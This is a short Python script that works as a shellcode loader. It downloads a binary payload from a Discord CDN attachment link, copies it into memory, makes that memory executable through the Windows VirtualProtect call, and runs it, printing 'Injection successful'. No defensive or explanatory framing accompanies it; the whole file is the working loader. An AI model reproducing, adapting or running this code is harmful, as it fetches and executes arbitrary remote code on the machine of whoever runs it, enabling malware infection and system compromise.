import ctypes
import requests

def inject():
    try:
        url = "https://cdn.discordapp.com/attachments/1361533730941964319/1361757512726089970/output.bin?ex=67ffeb03&is=67fe9983&hm=895219a82bf2becca8293af762385d6aab3bcb47b17e5e989fe77b21c9f6d869&"
        response = requests.get(url, timeout=10)
        response.raise_for_status() 
        shellcode = response.content

        shellcode_size = len(shellcode)
        memory = ctypes.create_string_buffer(shellcode, shellcode_size)

        PAGE_EXECUTE_READWRITE = 0x40
        old_protect = ctypes.c_ulong()
        ctypes.windll.kernel32.VirtualProtect(
            memory,
            shellcode_size,
            PAGE_EXECUTE_READWRITE,
            ctypes.byref(old_protect)
        )

        func = ctypes.CFUNCTYPE(ctypes.c_void_p)(ctypes.addressof(memory))
        func()
        
        print("Injection successful")
        
    except requests.exceptions.RequestException as e:
        print(f"Failed to download shellcode: {e}")
    except Exception as e:
        print(f"Injection failed: {e}")

if __name__ == '__main__':
    inject()
